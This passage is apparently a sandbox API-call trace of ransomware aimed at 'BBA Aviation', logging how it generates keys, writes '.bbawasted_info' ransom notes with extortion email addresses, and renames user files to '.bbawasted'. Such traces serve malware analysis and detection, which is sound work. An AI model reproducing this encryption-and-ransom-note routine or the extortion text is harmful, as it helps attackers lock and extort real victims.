dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0215.790] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0215.791] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xfb4e [0215.791] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfb4e) returned 0x5f0000 [0215.791] CloseHandle (hObject=0x294) returned 1 [0215.797] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0215.798] CloseHandle (hObject=0x280) returned 1 [0215.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0215.798] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6c58) returned 1 [0215.799] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0215.799] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0215.799] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0215.799] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0215.799] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0215.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0215.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0215.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.811] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]VEt1OtO84mPqWJWBRsQpI411eatnwhgyBIzwK5YL2GXKN5epef6okRzQJpBMIkZN\r\nWc0hgzHba9DcJzXzUPklyjUpHC7WakawAf3JZLlHASq0INCi5jf7XlMYbm0lZbci\r\n9fDCY47hwR1UVxG9ns4ytqPwpAvvTuCsz6unR5ij55ltv77q9F9gKBKfURM7PRzA\r\n0AjRa6l5pTFrIwIfDoy2ZOBhE1um3SpPvpU60gz2qZ0gFWYd19zxE2Nbwbvnn6SE\r\nwSBqD5mYuaH/P2wLqYHebXn1bss2M0YyPgEyh7jnBAg+JgmC8+9KC0E5fZ+/T9vu\r\nvN+f8uqp+YxCAb6Eqdty3XVMsJRHsQiJEe5pShFxwd1sIQGlh2Zi3f8GU6swHShm\r\njdSPQtdcjYXGVrAwN9Np4FwJ3pDaPYzcw3K2BPOM3PIYwI+hw6EzqF13Qg2gmEa5\r\n2uhJYi0+ZVP8k00MdXdMKXSDOtJRKQkBbS13g5QghkEyQFl4dCPUQYLNcaw+7L4j\r\nMOclR1179uQS30/obZObWd9yZ41Hud0QzqIplKvpCRlf1WOTyZ5NopI9nRwxlFCB\r\nGNcRzUBIxDY8BsgjW+33w3JnGqAOTsqPenDimhj6phhfUCVjjFpOep6mHfwZKvCf\r\nTk8Q6CB8mybbbr4eH3unBwKW4QwRAMjhSNhEimkNb3E=[end_key]\r\nKEEP IT\r\n") returned 984 [0215.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0215.811] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0215.812] SetEndOfFile (hFile=0x290) returned 1 [0215.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.814] CloseHandle (hObject=0x290) returned 1 [0215.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0215.979] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0a38 | out: hHeap=0x660000) returned 1 [0215.980] _aulldvrm () returned 0x0 [0215.980] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0215.980] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0215.980] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0215.980] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\HpkeD-g.rtf") returned 59 [0215.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6c4b88 [0215.981] lstrcpyW (in: lpString1=0x6c4bfe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0215.981] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.981] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0215.981] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0215.981] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0215.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\HpkeD-g.rtf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\hpked-g.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0215.982] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0215.983] SetEndOfFile (hFile=0x280) returned 1 [0215.983] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.983] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.983] lstrcpyW (in: lpString1=0x6c4bfe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0215.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\HpkeD-g.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\hpked-g.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\HpkeD-g.rtf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\hpked-g.rtf.bbawasted")) returned 1 [0215.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\HpkeD-g.rtf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\hpked-g.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0215.985] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0215.985] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16b3f [0215.985] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16b3f) returned 0x5f0000 [0215.985] CloseHandle (hObject=0x290) returned 1 [0215.991] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0215.992] CloseHandle (hObject=0x294) returned 1 [0215.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0215.992] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0215.992] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0215.992] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0215.993] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0215.993] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0215.993] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0216.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0216.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.003] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]k4ZBriVZRcMsM8VCKG3zHBJ5ZGDpbulSZu0v11QnrTIaBSW7EjTYldbfRIe/qbBJ\r\nrVr6ZawEd/oRoC5gmtrZnv0Eq9fr3ggT3tICDhessSJluCGXYwhP+HuHOcTJWdwK\r\n3Zc68vuCb6+l9zfVG7N31ks85a1o9OmAVh7J1ntUeXSFSRyDAFNK41g5ntovlVxP\r\nTXcfUKYSjyc+1AjW/BDXCdtKXrZSSzhjd5wdrPW7rezqEiMP/3NX4z9sFErckAyD\r\nBvfeThe3xcu0Mp+uOCK3gywyL6nXVV1mpODDQsEfmtHLtnw2WmXuf7xAScZ29R2K\r\nytPI3hKlpe5tg7//f+E9lA6/uM806yn6eUJsoNwJSFp+vidWLShmMIkrESnnm+VE\r\nygX5103qpgWBt6NA0pYnKqmi6WnfIWs1oLXlsWWugObgBn0YZtsOo2oUg6tBdRPU\r\nCoYq3X+aU5EhwoScALeq8JfTJz41ktVOhkiJAFzQw5jG3157gQpFyAH6UUhZ4hu8\r\nZxZEMDithhZRiQQXY/a2J6aP0Dl9lJ5Psbi5uvC046eAyTySisFtcvOmmtzyCyAG\r\nMxKKHagPszsEJXdEB33SCITQ5yCF5DwSVAG0uL01vDTHlp2qTC4ybE5B2X8YZvEq\r\nyv4ibN8TAmfcE2r75bMzvZsUr9KXTTE5R0b57qmaJwa=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.003] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0216.003] SetEndOfFile (hFile=0x280) returned 1 [0216.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.006] CloseHandle (hObject=0x280) returned 1 [0216.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0216.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x660000) returned 1 [0216.285] _aulldvrm () returned 0x0 [0216.285] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0216.286] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0216.286] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0216.286] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\oCsdDdEd.ots") returned 60 [0216.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6c4b88 [0216.286] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.286] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0216.287] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.287] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0216.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\oCsdDdEd.ots.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\ocsddded.ots.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0216.288] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0216.290] SetEndOfFile (hFile=0x280) returned 1 [0216.290] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.290] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0216.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\oCsdDdEd.ots" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\ocsddded.ots"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\oCsdDdEd.ots.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\ocsddded.ots.bbawasted")) returned 1 [0216.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\GExVJ7vWUebr\\oCsdDdEd.ots.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\gexvj7vwuebr\\ocsddded.ots.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0216.291] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0216.291] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x45a2 [0216.292] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x45a2) returned 0x600000 [0216.292] CloseHandle (hObject=0x288) returned 1 [0216.298] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0216.299] CloseHandle (hObject=0x27c) returned 1 [0216.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0216.299] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0216.299] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0216.299] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0216.300] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0216.300] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0216.300] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0216.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0216.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.311] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GxolZcl6gNHE+Cm91ppHOhVseZVEEBKpH9YoY2iDPfkodpBB6X4e7CIEPmBI+pGB\r\nkvJq7RXr5HemFbsMOpTlFrUNH9NVvyweKeKLZ5hcPPoeCE5XVv/wQCrenc00lWs/\r\nMx4IYqSAVJ5U41urofwLiJvXPgEw828FtrUZXViMpWRAhu5DtjMcSN25fMmg/Eje\r\n/AgqRAw51/id5azlHqtdS9Wg43NK+tvJ+NZqsRAoUgpAXsih7K3Vdu5AcR0dNJYw\r\nAb679+4LQsuSI/ORFJLoKPfh9zvKfsP0UxFb1oKX9mHwpyRGzvPkDqhzvfDu8kOx\r\n9MRoEI7H5JQjNJHBIPlc3TfhCozmZG0SX6/Oz80zXsHWDo/hxMnjvAhhYZOwTsMH\r\niY/xLXQRe+CDbcTSIIuPT029047aWgFX+HfADpzkmhyRlg0sgNAzA0rCYDCkAUhM\r\neEoBpld1+Fb1JFU0sdRuYS45xUIVW4iw79s7gyJ4LkghM0WqggbQq9gvcI6erkoO\r\nx3RH2vQ7akr1D1/s+MoTfSh6p9yrHdSM4IhGZzN06drQzN/a4IWN9Jr05cm4FKmF\r\nNPoR9toIZJXegK3r05brnqO1ryxaaFyI6Pp6x4bXehfPQgVuZbSMyv7ZeuCeSRzs\r\nrJbo5fyGT4fDc9dx7OR4yE3pARfhhSrGI6/ZOvLBD+n=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.311] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0216.311] SetEndOfFile (hFile=0x280) returned 1 [0216.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.314] CloseHandle (hObject=0x280) returned 1 [0216.680] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0216.681] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7690 | out: hHeap=0x660000) returned 1 [0216.681] _aulldvrm () returned 0x0 [0216.681] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0216.682] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0216.682] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0216.682] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ILAcjhE_SZb_xUwu.csv") returned 55 [0216.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6c4b88 [0216.682] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.682] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0216.683] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.683] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0216.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ILAcjhE_SZb_xUwu.csv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ilacjhe_szb_xuwu.csv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0216.684] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0216.686] SetEndOfFile (hFile=0x280) returned 1 [0216.686] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.686] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0216.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ILAcjhE_SZb_xUwu.csv" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ilacjhe_szb_xuwu.csv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ILAcjhE_SZb_xUwu.csv.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ilacjhe_szb_xuwu.csv.bbawasted")) returned 1 [0216.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\ILAcjhE_SZb_xUwu.csv.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ilacjhe_szb_xuwu.csv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0216.687] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0216.688] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x8ec0 [0216.688] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8ec0) returned 0x5f0000 [0216.688] CloseHandle (hObject=0x290) returned 1 [0216.689] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0216.690] CloseHandle (hObject=0x294) returned 1 [0216.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0216.690] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0216.691] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0216.691] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0216.691] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0216.692] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0216.692] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0216.704] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.705] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0216.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.705] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR 